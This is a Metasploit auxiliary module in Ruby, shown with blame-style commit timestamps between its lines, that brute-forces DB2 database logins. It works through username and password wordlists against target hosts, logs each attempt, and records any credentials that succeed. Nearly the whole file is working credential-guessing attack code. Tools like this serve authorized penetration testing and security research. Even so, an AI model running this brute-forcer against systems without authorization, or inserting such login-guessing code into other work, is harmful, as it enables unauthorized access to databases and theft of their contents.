2010-01-25 15:58:24 +00:00
##
# $Id$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf :: Auxiliary
include Msf :: Exploit :: Remote :: DB2
include Msf :: Auxiliary :: AuthBrute
include Msf :: Auxiliary :: Scanner
include Msf :: Auxiliary :: Report
def initialize
super (
'Name' = > 'DB2 Authentication Brute Force Utility' ,
'Version' = > '$Revision$' ,
'Description' = > %q{ This module attempts to authenticate against a DB2
instance using username and password combinations indicated by the
USER_FILE , PASS_FILE , and USERPASS_FILE options . } ,
'Author' = > [ 'todb' ] ,
'License' = > MSF_LICENSE
)
register_options (
[
OptBool . new ( 'VERBOSE' , [ true , 'Verbose output' , false ] ) ,
OptPath . new ( 'USERPASS_FILE' , [ false , " File containing (space-seperated) users and passwords, one pair per line " , File . join ( Msf :: Config . install_root , " data " , " wordlists " , " db2_default_userpass.txt " ) ] ) ,
OptPath . new ( 'USER_FILE' , [ false , " File containing users, one per line " , File . join ( Msf :: Config . install_root , " data " , " wordlists " , " db2_default_user.txt " ) ] ) ,
OptPath . new ( 'PASS_FILE' , [ false , " File containing passwords, one per line " , File . join ( Msf :: Config . install_root , " data " , " wordlists " , " db2_default_pass.txt " ) ] ) ,
] , self . class )
# Users must use user/pass/userpass files.
deregister_options ( 'USERNAME' , 'PASSWORD' )
end
def run_host ( ip )
each_user_pass { | user , pass |
2010-03-05 00:44:39 +00:00
userpass_sleep_interval unless self . credentials_tried . empty?
this_cred = [ user , ip , rport ] . join ( " : " )
next if self . credentials_tried [ this_cred ] == pass || self . credentials_good [ this_cred ]
do_login ( user , pass , this_cred , datastore [ 'DATABASE' ] )
self . credentials_tried [ this_cred ] = pass
2010-01-25 15:58:24 +00:00
}
end
2010-03-05 00:44:39 +00:00
def do_login ( user = nil , pass = nil , this_cred = nil , db = nil )
verbose = datastore [ 'VERBOSE' ]
datastore [ 'USERNAME' ] = user
datastore [ 'PASSWORD' ] = pass
2010-01-25 15:58:24 +00:00
print_status ( " Trying username:' #{ user } ' with password:' #{ pass } ' against #{ rhost } : #{ rport } " ) if verbose
begin
info = db2_check_login
rescue :: Rex :: ConnectionError
print_error ( " #{ rhost } : #{ rport } : Unable to attempt authentication " ) if verbose
return :done
rescue :: Rex :: Proto :: DRDA :: RespError = > e
print_error ( " #{ rhost } : #{ rport } : Error in connecting to DB2 instance: #{ e } " ) if verbose
return :error
end
disconnect
2010-02-08 18:54:50 +00:00
# Report service state
report_service (
:host = > rhost ,
:port = > rport ,
:name = > " db2 "
)
2010-01-25 15:58:24 +00:00
if info [ :db_login_success ]
2010-02-08 20:12:35 +00:00
print_good ( " #{ rhost } : #{ rport } DB2 - successful login for ' #{ user } ' : ' #{ pass } ' against database ' #{ db } ' " )
2010-03-05 00:44:39 +00:00
self . credentials_good [ this_cred ] = pass
2010-02-08 18:54:50 +00:00
# Report credentials
2010-01-25 15:58:24 +00:00
report_auth_info (
:host = > rhost ,
:proto = > 'db2' ,
:user = > user ,
:pass = > pass ,
2010-02-08 18:54:50 +00:00
:database = > db ,
2010-01-25 15:58:24 +00:00
:targ_host = > rhost ,
:targ_port = > rport
)
return :next_user
else
2010-02-08 20:12:35 +00:00
print_status ( " #{ rhost } : #{ rport } DB2 - failed login for ' #{ user } ' : ' #{ pass } ' against database ' #{ db } ' " ) if verbose
2010-01-25 15:58:24 +00:00
return :fail
end
end
end
